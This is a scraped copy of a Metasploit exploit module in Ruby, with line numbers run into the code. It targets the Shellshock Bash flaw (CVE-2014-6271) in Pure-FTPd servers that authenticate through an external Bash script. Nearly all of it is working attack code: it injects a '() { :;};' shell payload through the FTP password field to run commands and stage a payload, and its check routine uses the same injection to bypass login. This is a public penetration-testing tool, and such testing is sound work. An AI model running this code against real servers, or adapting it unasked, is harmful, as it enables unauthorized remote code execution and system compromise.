Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Ftp9include Msf::Exploit::CmdStager1011def initialize(info = {})12super(update_info(info,13'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)',14'Description' => %q(15This module exploits the Shellshock vulnerability, a flaw in how the Bash shell16handles external environment variables. This module targets the Pure-FTPd FTP17server when it has been compiled with the --with-extauth flag and an external18Bash script is used for authentication. If the server is not set up this way,19the exploit will fail, even if the version of Bash in use is vulnerable.20),21'Author' =>22[23'Stephane Chazelas', # Vulnerability discovery24'Frank Denis', # Discovery of Pure-FTPd attack vector25'Spencer McIntyre' # Metasploit module26],27'References' =>28[29[ 'CVE', '2014-6271' ],30[ 'CWE', '94' ],31[ 'OSVDB', '112004' ],32[ 'EDB', '34765' ],33[ 'URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc' ],34[ 'URL', 'http://download.pureftpd.org/pub/pure-ftpd/doc/README.Authentication-Modules' ]35],36'Payload' =>37{38'DisableNops' => true,39'Space' => 204840},41'Targets' =>42[43[ 'Linux x86',44{45'Platform' => 'linux',46'Arch' => ARCH_X86,47'CmdStagerFlavor' => :printf48}49],50[ 'Linux x86_64',51{52'Platform' => 'linux',53'Arch' => ARCH_X64,54'CmdStagerFlavor' => :printf55}56]57],58'DefaultOptions' =>59{60'PrependFork' => true61},62'DefaultTarget' => 0,63'DisclosureDate' => '2014-09-24',64'Notes' =>65{66'AKA' => [ 'Shellshock' ],67'Stability' => [ CRASH_SAFE, ],68'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],69'Reliability' => [ REPEATABLE_SESSION, ],70},71))72register_options(73[74Opt::RPORT(21),75OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])76])77deregister_options('FTPUSER', 'FTPPASS')78end7980def check81# this check method tries to use the vulnerability to bypass the login82username = rand_text_alphanumeric(rand(20) + 1)83random_id = (rand(100) + 1)84command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"85if send_command(username, command) =~ /^2\d\d ok./i86disconnect87return CheckCode::Safe if banner !~ /pure-ftpd/i8889command = "echo auth_ok:0; echo end"90if send_command(username, command) =~ /^5\d\d login authentication failed/i91disconnect92return CheckCode::Vulnerable93end94end95disconnect9697CheckCode::Safe98end99100def execute_command(cmd, _opts)101cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")102username = rand_text_alphanumeric(rand(20) + 1)103send_command(username, cmd)104end105106def exploit107execute_cmdstager(linemax: 500)108handler109end110111def send_command(username, cmd)112cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""113connect114send_user(username)115password_result = send_pass(cmd)116disconnect117password_result118end119end120121122